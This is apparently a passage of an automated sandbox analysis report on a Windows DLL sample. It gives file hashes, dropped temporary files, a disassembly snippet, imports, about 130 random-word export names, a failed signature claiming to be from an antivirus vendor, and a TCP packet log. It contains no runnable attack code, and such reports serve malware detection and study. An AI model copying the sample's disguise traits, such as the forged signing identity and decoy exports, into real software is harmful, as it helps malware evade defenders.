cmVmZXJlbmNlczwvaDM+PGRpdiBjbGFzcz0ib3QtcGxpLWhkciI+PHNwYW4gY2xhc3M9Im90LWxpLXRpdGxlIj5Db25zZW50PC9

C:\Users\user\AppData\Local\Temp\~DF06D65394E82C079F.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	13557
Entropy (8bit):	0.7685260522770581
Encrypted:	false
SSDEEP:	48:kBqoIDNDLDf9mDmla93K3V+mlQ93V+pw3b93Nmq993NsK3b9n:kBqoIx3Lyp
MD5:	709C3E30A832AC50CDD01BC2FE97FA0E
SHA1:	D93E21297286F8066DE0011F33CF4E73F6537274
SHA-256:	B45075304CC5D6CFC05114CA857FE91DA1023BCA11F70C9E160467096B840E0C
SHA-512:	7023B59A2645DA0D7ED8D943B4414F9835170DA1321EE2F2392466E19C6A5D6C3293B26DCE1961A4ED8864BC148C7AEEF52D6BD76C925E831A2B420C46DC11ED
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF5890EC7D883A1DE6.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	189088
Entropy (8bit):	3.148444593300474
Encrypted:	false
SSDEEP:	3072:5iqZ/2Bfc6ru5rXfVStpxiqZ/2BfcJru5rXfVSt:Yrg
MD5:	DA792A894F3DD6C7D5289506B6B092D7
SHA1:	B85B474FD0D28D862F465887C176C8892B7350B0
SHA-256:	B5846A28F11F388E19B45B1F0042F965BACB278E803CED9B44593643F1746346
SHA-512:	51C0B9577FD067CCED76C09E2F5EE2446AADF2F7658D1E16A73F614C939A4B510437FDDBACA32CF61D61A8F3207819EBA9B4FE222044F0E43DC99E7ECF3D8348
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF95D4EF5F47AFED7D.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	29989
Entropy (8bit):	0.330593829652112
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwv9lwv9l2DN/9l2DV9l:kBqoxKAuvScS+oup+oJy
MD5:	455CFFCDFDA58236BA3E04BB50D7585B
SHA1:	221D3C62E792B2051EE7298DE392C9E10EB0B684
SHA-256:	6BD49E055F7CEFA5EAC87D8AB2CF74A88DC32E1CA6481A731452C6F24EB6830B
SHA-512:	A93268279AF4D2AD5BCE19959CC8940150225868F815F606CD6ACAF1A80E4E14A76C323E4A21194A2E4FDECE3759BE135040DFAE3019448DABCDBF9634D1F679
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF9BF3CDF992581706.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39505
Entropy (8bit):	0.5450637237103452
Encrypted:	false
SSDEEP:	48:kBqoxKAuvScS+vRT6+I++cybPnd2u2qMNOccybPnd2u2qMNOccybPnd2u2qMNO9:kBqoxKAuvScS+vRT6hrLsJLsFLsq
MD5:	0A9380C7226F2071AF64AAEF34AB5411
SHA1:	282B6A8BF4552E08E14185914A83E40327375708
SHA-256:	4A17358AA3ADD55BCA198FBAEEDC5EF7F2B98FA738D32BC235D8D7361D0B7A1D
SHA-512:	CA34F0D2DCAFAA6072C26A04887FD401F3B7E0988FE0D49BF113B4E3C7E70CEB33E36069A53E71252CFFF1AB744E9E52DD44192942F1B862A755AE04759E9296
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M1XM3S4LCIFC2FY0LG68.temp Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	modified
Size (bytes):	5149
Entropy (8bit):	3.181499857466863
Encrypted:	false
SSDEEP:	96:FPDlkm9SGAJIKPDlk73SGAFKPDlkt9SGAf:Fg4
MD5:	46FAA947FA9C73B1DCE2871C790EE3CE
SHA1:	F1DBAF3E129DF610C7544235CCBEEC858A9D4964
SHA-256:	7BF927A01E34FEA7B21314242001F7ECB25C905F3729F4364A6572E406F964AA
SHA-512:	E7DD591C4EE215573FCE65C28BC352730848DA19A27507730CBD627220A7653655A6EA866A43ACB566B5EA4D78D14F6B507A084D69B0E17332906AAB56B49BE7
Malicious:	false
Preview:	...................................FL..................F.@.. .....@.>...R.E.......?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.u..PROGRA~1..t......L.>Q.u....E...............J.....q`..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.sQw...............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.JsQw......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]...........i.U......C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

Static File Info

General
File type:	MS-DOS executable, MZ for MS-DOS
Entropy (8bit):	6.258895798624354
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% VXD Driver (31/22) 0.00% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	0pz1on1.dll
File size:	128584
MD5:	b1a199b3bd47cb4af5a75328c0a8ed36
SHA1:	c134eb3ba368cf6cef5c1dfa47b36fd68cc63a5e
SHA256:	2900169349643be6f77530141614eeac56e7b22387b9acf866ed4e4922e32401
SHA512:	2a1a44dfcc29024187d40fb3b5506102098a89c355aa63a28e2fa8ffa1f881e2a920aa08fc2a0455462ce1b2d38b6d8c74310955eb03162d31a9eedcc92e3e6c
SSDEEP:	3072:CQnYofaER5NNrTy45UVBxiCoph/7zZwUsheeoFYaco5gpiiS4CxlQWbSpLyh:ziEhlgybnZw9eXFYaPup/eQWbSpuh
File Content Preview:	MZ......................................................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.................%............@..................................K...............................q.....

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x4025df
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	5862d099678e2435c1c23c2ec5b15d34

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=GlobalSign ObjectSign CA, OU=ObjectSign CA, O=GlobalSign nv-sa, C=BE
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	11/16/2007 1:28:47 AM 11/16/2010 1:28:47 AM
Subject Chain	E=sign@gdata.de, CN=G DATA Software AG, O=G DATA Software AG, C=DE
Version:	3
Thumbprint MD5:	56BAA2B4B4D2E0DFE97B2BEDE09E9A7A
Thumbprint SHA-1:	BF623C6F13CE36256DC1AF8E3329E2C0401BE3A3
Thumbprint SHA-256:	C73F1036ADF9436179E8A04619A47C13452854054EAAEBEFFAD30C85967435C7
Serial:	0100000000011647C9FA8E

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 34h
push esi
call dword ptr [004016ACh]
mov dword ptr [ebp-08h], eax
mov dword ptr [0041E5BCh], eax
push FFFFFF83h
push eax
push 00000049h
push dword ptr [0041E64Ch]
push FFFFFFEBh
push 00000001h
push 0000001Ah
call 00007F272C86B461h
push 0000000Dh
push 0040A034h
call dword ptr [00401724h]
test eax, eax
je 00007F272C86C40Bh
mov dword ptr [ebp-30h], eax
push dword ptr [0041E5BCh]
push dword ptr [0041E64Ch]
push 00000023h
call 00007F272C86EE7Bh
mov dword ptr [ebp-34h], eax
mov eax, 252C54F6h
sub eax, eax
mov dword ptr [0041E644h], eax
push FFFFFFF9h
push dword ptr [0041E64Ch]
push 00000026h
call 00007F272C870840h
add esp, 0Ch
mov dword ptr [0041E644h], eax
mov eax, 00000028h
mov dword ptr [0041E644h], eax
push dword ptr [0041E644h]
push 00000008h
push 00000019h
push 00000071h
push FFFFFFFAh
push dword ptr [0041E5BCh]
push 00000064h
push 0000006Ch
call 00007F272C86DD29h
mov dword ptr [0041E644h], eax
push 00000013h
jmp 00007F272C86ED62h
add ecx, eax
mov dword ptr [ecx+000000A4h], eax
mov dword ptr [esp+38h], eax
cmp esi, 10h
mov ecx, 00000044h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x7114	0xaee	.text
IMAGE_DIRECTORY_ENTRY_IMPORT	0x150c	0xf0	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x1e000	0x1648	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2a000	0x8bc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x11e8	0x118	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1628	0x16c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x7af8	0x7c00	False	0.642578125	data	6.6972475816	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0x16c	0x200	False	0.388671875	data	2.49407819399	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x1fe5c	0x14800	False	0.663467035061	data	5.5440422783	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0x2a000	0x8bc	0xa00	False	0.768359375	data	6.3600431831	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
iassdo.dll	DllGetClassObject
kernel32.dll	lstrcpyW, TerminateThread, SetLastError, LoadResource, FormatMessageW, VirtualProtect, FreeLibrary, QueryPerformanceCounter, CreateThread, TlsSetValue, GetCurrentProcessId, GetFileAttributesW, TlsFree, TlsGetValue, GetWindowsDirectoryW, lstrcpynW, TlsAlloc, CreateFileW, GetLastError, GetTickCount, TerminateProcess, FreeResource, GetModuleHandleW, UnhandledExceptionFilter, SizeofResource, WriteFile, InterlockedIncrement, GetOEMCP, GetSystemDefaultUILanguage, GetCurrentThreadId, FindResourceW, GetCommandLineW, GetModuleFileNameW, GetProcAddress, CloseHandle, LoadLibraryW, SetUnhandledExceptionFilter, InterlockedDecrement, lstrlenA, GetCurrentProcess
msvcirt.dll	??_7ostream@@6B@
ntdll.dll	NtQueryVolumeInformationFile
odbcbcp.dll	bcp_colfmt
ole32.dll	ReleaseStgMedium
rtm.dll	RtmGetRouteAge
shell32.dll	ShellExecuteW, SHGetFileInfoW, DragQueryFileW, SHChangeNotify, SHParseDisplayName, SHChangeNotifySuspendResume
shlwapi.dll	StrToIntW, PathAppendW, StrToIntA, PathBuildRootW
user32.dll	MsgWaitForMultipleObjects, PostMessageW, SetWindowPos, EnableWindow, SendDlgItemMessageW, LoadStringA, SetWindowLongW, GetKeyboardLayout, GetClientRect, CreateWindowExA, EndDialog, wsprintfW, LoadImageW, DialogBoxParamW, WinHelpW, GetSystemMetrics, SetDlgItemTextW, LoadIconW, GetWindowLongW, LoadStringW, SendMessageW, wsprintfA, DestroyIcon
usp10.dll	UspFreeMem

Exports

Name	Ordinal	Address
Megacerotine	1	0x4017e7
Polyvalence	2	0x401869
Reasonedly	3	0x401915
Fretfulness	4	0x401a15
Innominables	5	0x401b34
Mirthlessness	6	0x401cf5
Napecrest	7	0x401d53
Perisphinctes	8	0x401df7
Choreus	9	0x401e45
Monosyllabical	10	0x401ef3
Blennosis	11	0x401f35
Nonsmutting	12	0x401f97
Unignored	13	0x402027
Tenaillon	14	0x4021a0
Uratosis	15	0x4021f4
DllGetClassObject	16	0x4023b6
Woodroof	17	0x4023d4
Telenergic	18	0x40241c
Prenational	19	0x40248d
Odontoblast	20	0x4024e0
Cultic	21	0x4025df
Lorettoite	22	0x4027f4
Presphenoid	23	0x4028d7
Saponarin	24	0x40295e
Afterwrath	25	0x402a9d
Pragmatistic	26	0x402afa
Retumescence	27	0x402b81
Sillery	28	0x402cc5
Fractuosity	29	0x402d4f
Dermatoptera	30	0x402dc7
Preambulate	31	0x403078
Syphilophobia	32	0x40311e
Matricaria	33	0x403143
Diffrangibility	34	0x4031ae
Languor	35	0x4031f0
Contestably	36	0x40342a
Subtreasurership	37	0x40349a
Pentelic	38	0x4035d0
Cainish	39	0x4037de
Superordinary	40	0x403813
Replight	41	0x40387a
Southronie	42	0x4038fc
Carkingly	43	0x40397b
DllUnregisterServer	44	0x4039f7
Dacryosyrinx	45	0x403a4f
Unendeared	46	0x403ae7
Utas	47	0x403bf5
DllCanUnloadNow	48	0x403c4c
Metromalacosis	49	0x403d09
Tingtang	50	0x403d6d
Sangha	51	0x403e0a
Shorea	52	0x403e7a
Dermatobia	53	0x403ef4
Multilateral	54	0x403f5f
Rhigotic	55	0x404040
Percussor	56	0x4040bb
Redate	57	0x40412a
Brachygrapher	58	0x404217
Extracathedral	59	0x4043ef
Nonconductibility	60	0x40442b
Overquiet	61	0x4044d1
Tursiops	62	0x404554
Disconsolate	63	0x4045af
Enterprisingly	64	0x404659
Strouthocamelian	65	0x4046ed
Pic	66	0x40471b
Litchi	67	0x4047bf
Overcare	68	0x40481c
Unresting	69	0x4048a6
Heteromeral	70	0x40492e
Anoplotherioid	71	0x404abc
Beslimer	72	0x404b28
Hydrofluorid	73	0x404b6d
Represser	74	0x404bb0
Trichronous	75	0x404c0f
Dimness	76	0x404c80
Unresistant	77	0x404d86
Keratohelcosis	78	0x404dc0
Anaberoga	79	0x404e06
Whifflery	80	0x404f93
Disarmed	81	0x40503d
Antiprostatic	82	0x405125
Funds	83	0x405190
Intersusceptation	84	0x4051d4
Somnolescence	85	0x40522c
Forkhead	86	0x4052a3
Unsensitized	87	0x40534e
Bibbler	88	0x4053a7
Fortis	89	0x405424
Formalith	90	0x405462
Schediasm	91	0x4054c0
Reh	92	0x40556a
Xenogeny	93	0x4055eb
Unpenned	94	0x405656
Epiphyte	95	0x4056f1
Cornubianite	96	0x405726
Arshin	97	0x40585a
Counterplan	98	0x4058ef
Unuseful	99	0x40597c
Ooscopy	100	0x405a05
Tassie	101	0x405a5f
Blackhander	102	0x405aa1
Antiturnpikeism	103	0x405cc6
Consenter	104	0x405d3b
Upchamber	105	0x405e35
Carmelite	106	0x405e7b
Acetylbenzoate	107	0x405ed8
Bumbailiffship	108	0x405f59
Pavonize	109	0x405ff2
Lutescent	110	0x4060bf
Melonmonger	111	0x406189
Erechtheus	112	0x4061dd
Preadvisory	113	0x406286
Orphreyed	114	0x40636e
Liquidizer	115	0x4063fc
Monogenetica	116	0x4064b7
Doggerelizer	117	0x406559
Supereloquent	118	0x4065c3
Calculagraph	119	0x406673
Hernia	120	0x4066fc
Ventriloquously	121	0x406800
Naw	122	0x40697f
Phaneroscope	123	0x4069b0
Discoursiveness	124	0x406a4d
Unamended	125	0x406b1a
DllRegisterServer	126	0x406b45
Corporationer	127	0x406c10
Surflike	128	0x406c43
Pavonia	129	0x406d53
Enkindle	130	0x406ebd
Dacryelcosis	131	0x4070a0

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 19, 2020 09:11:58.119923115 CET	49744	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.120954037 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.125833988 CET	49746	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.125873089 CET	49747	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.137401104 CET	443	49744	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.137502909 CET	49744	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.138482094 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.138588905 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.139554024 CET	49744	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.140208960 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.140500069 CET	49748	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:11:58.140656948 CET	49750	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:11:58.140676022 CET	49749	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:11:58.158190012 CET	443	49746	87.248.118.22	192.168.2.5
Nov 19, 2020 09:11:58.158340931 CET	49746	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.159006119 CET	49746	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.159965038 CET	443	49744	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.162682056 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.162736893 CET	443	49744	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.162776947 CET	443	49744	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.162807941 CET	443	49744	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.162822962 CET	49744	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.162858963 CET	49744	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.162863016 CET	49744	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.163019896 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.163095951 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.163248062 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.163280010 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.163310051 CET	443	49748	151.101.1.44	192.168.2.5
Nov 19, 2020 09:11:58.163327932 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.163337946 CET	443	49747	87.248.118.22	192.168.2.5
Nov 19, 2020 09:11:58.163345098 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.163404942 CET	443	49749	151.101.1.44	192.168.2.5
Nov 19, 2020 09:11:58.163408041 CET	49748	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:11:58.163435936 CET	49747	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.163500071 CET	49749	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:11:58.163835049 CET	443	49750	151.101.1.44	192.168.2.5
Nov 19, 2020 09:11:58.163927078 CET	49748	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:11:58.165533066 CET	49750	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:11:58.165569067 CET	49750	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:11:58.170312881 CET	49749	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:11:58.175571918 CET	49747	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.178388119 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.178803921 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.179167032 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.179270029 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.179681063 CET	49744	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.180092096 CET	49744	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.181324959 CET	443	49748	151.101.1.44	192.168.2.5
Nov 19, 2020 09:11:58.182271004 CET	443	49748	151.101.1.44	192.168.2.5
Nov 19, 2020 09:11:58.182291985 CET	443	49748	151.101.1.44	192.168.2.5
Nov 19, 2020 09:11:58.182307959 CET	443	49748	151.101.1.44	192.168.2.5
Nov 19, 2020 09:11:58.182353973 CET	49748	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:11:58.182384968 CET	49748	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:11:58.183022976 CET	443	49750	151.101.1.44	192.168.2.5
Nov 19, 2020 09:11:58.184477091 CET	443	49750	151.101.1.44	192.168.2.5
Nov 19, 2020 09:11:58.184518099 CET	443	49750	151.101.1.44	192.168.2.5
Nov 19, 2020 09:11:58.184536934 CET	443	49750	151.101.1.44	192.168.2.5
Nov 19, 2020 09:11:58.184586048 CET	49750	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:11:58.184624910 CET	49750	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:11:58.186294079 CET	443	49746	87.248.118.22	192.168.2.5
Nov 19, 2020 09:11:58.186573029 CET	443	49746	87.248.118.22	192.168.2.5
Nov 19, 2020 09:11:58.186594963 CET	443	49746	87.248.118.22	192.168.2.5
Nov 19, 2020 09:11:58.186645985 CET	443	49746	87.248.118.22	192.168.2.5
Nov 19, 2020 09:11:58.186664104 CET	443	49746	87.248.118.22	192.168.2.5
Nov 19, 2020 09:11:58.186686993 CET	49746	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.186707973 CET	443	49746	87.248.118.22	192.168.2.5
Nov 19, 2020 09:11:58.186713934 CET	49746	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.186733961 CET	49746	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.186789036 CET	49746	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.187859058 CET	443	49749	151.101.1.44	192.168.2.5
Nov 19, 2020 09:11:58.189291000 CET	443	49749	151.101.1.44	192.168.2.5
Nov 19, 2020 09:11:58.189347982 CET	49749	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:11:58.189362049 CET	443	49749	151.101.1.44	192.168.2.5
Nov 19, 2020 09:11:58.189384937 CET	443	49749	151.101.1.44	192.168.2.5
Nov 19, 2020 09:11:58.189409971 CET	49749	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:11:58.189426899 CET	49749	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:11:58.195286036 CET	49748	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:11:58.196237087 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.196407080 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.196415901 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.196463108 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.196770906 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.196811914 CET	49748	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:11:58.196964979 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.197024107 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.197156906 CET	49748	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:11:58.197199106 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.197253942 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.197257996 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.197320938 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.197396994 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.197424889 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.197452068 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.197453022 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.197474003 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.197479010 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.197494984 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.197506905 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.197525978 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.197539091 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.197550058 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.197586060 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.197696924 CET	49748	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:11:58.197839022 CET	49748	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:11:58.197846889 CET	443	49744	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.197984934 CET	443	49744	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.198009014 CET	443	49744	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.198077917 CET	49744	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.198107004 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.198134899 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.198160887 CET	49750	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:11:58.198175907 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.198191881 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.198227882 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.198257923 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.198285103 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.198304892 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.198565006 CET	49750	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:11:58.198873043 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.198940039 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.198940039 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.198995113 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.200506926 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.200537920 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.200608969 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.200630903 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.201313019 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.201343060 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.201387882 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.201519966 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.201880932 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.201909065 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.201946974 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.201960087 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.202807903 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.202848911 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:11:58.202903986 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:11:58.203618050 CET	49744	443	192.168.2.5	151.101.2.132
